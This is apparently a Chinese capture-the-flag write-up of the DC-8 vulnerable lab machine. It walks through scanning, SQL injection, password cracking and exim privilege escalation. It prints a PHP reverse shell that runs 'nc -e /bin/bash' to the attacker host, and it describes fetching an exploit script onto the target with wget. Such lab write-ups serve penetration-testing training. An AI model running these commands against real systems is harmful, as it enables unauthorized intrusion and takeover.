DC-8

DC系列是专门构建的易受攻击的实验室，旨在获得渗透测试领域的经验，目前总共有9个靶机
关注微信公众号：网络安全101，公众号内回复**DC**，即可获取DC系列靶机镜像！

导入DC8靶机，网络适配器选择NAT模式，确保和kali处于同一IP段！！！

## 信息收集

> 确定IP地址

```
netdiscover -i eth0 -r 192.168.84.0/24
```

![image-20221221152434215](https://oss.maolin101.com/20250107035507464.png-101.webp)

> 扫描端口

![image-20221221152623543](https://oss.maolin101.com/20250107035507465.png-101.webp)

> nmap 漏洞扫描

```
nmap 192.168.84.184 -p 80 --script=vuln
```

![image-20221221153028042](https://oss.maolin101.com/20250107035507466.png-101.webp)

## web测试

> 该页面可能存在SQL注入

![image-20221221152946187](https://oss.maolin101.com/20250107035507467.png-101.webp)

![image-20221221152956237](https://oss.maolin101.com/20250107035507468.png-101.webp)

> SQLMAP

![image-20221221153115393](https://oss.maolin101.com/20250107035507469.png-101.webp)

> 跑库-跑表-跑字段

![image-20221221153156822](https://oss.maolin101.com/20250107035507470.png-101.webp)

![image-20221221153235876](https://oss.maolin101.com/20250107035507471.png-101.webp)

![image-20221221153321325](https://oss.maolin101.com/20250107035507472.png-101.webp)

![image-20221221153406831](https://oss.maolin101.com/20250107035507473.png-101.webp)

> 使用john解密

john --wordlist=/usr/share/john/password.lst --rules dc8.txt

![image-20221221154129734](https://oss.maolin101.com/20250107035507474.png-101.webp)

```
 账户密码：john,turtle
```

> 登录成功

![image-20221221154559739](https://oss.maolin101.com/20250107035507475.png-101.webp)

> 文章处写反弹shell

```php
<?php
exec("nc -e /bin/bash 192.168.84.174 10086");
?> 
```

![image-20221221155109040](https://oss.maolin101.com/20250107035507476.png-101.webp)

邮件里面随便填写内容后提交

![image-20221221155944523](https://oss.maolin101.com/20250107035507477.png-101.webp)

> 获得shell

![image-20221221160205725](https://oss.maolin101.com/20250107035507478.png-101.webp)

e

## 提权

> 查看是否有可用的SUID提权

find / -user root -perm -4000 -print 2>/dev/null

![image-20221221160402474](https://oss.maolin101.com/20250107035507479.png-101.webp)

> exim4

Exim是一个MTA（Mail Transfer Agent，邮件传输代理）服务器软件，该软件基于GPL协议开发，是一款开源软件。该软件主要运行于类UNIX系统

查看版本，4.0以上

![image-20221221160706807](https://oss.maolin101.com/20250107035507480.png-101.webp)

> 查询是否存在历史漏洞

![image-20221221160902577](https://oss.maolin101.com/20250107035507481.png-101.webp)

拷贝到当前目录

![image-20221221160942418](https://oss.maolin101.com/20250107035507482.png-101.webp)

> http服务

攻击机开启http服务

![image-20221221161328968](https://oss.maolin101.com/20250107035507483.png-101.webp)

目标机将46996.sh文件使用wget 命令下载到本地

![image-20221221161438974](https://oss.maolin101.com/20250107035507484.png-101.webp)

> 添加执行权限

![image-20221221161743070](https://oss.maolin101.com/20250107035507485.png-101.webp)

![image-20221221161731088](https://oss.maolin101.com/20250107035507486.png-101.webp)

> flag

![image-20221221162030296](https://oss.maolin101.com/20250107035507487.png-101.webp)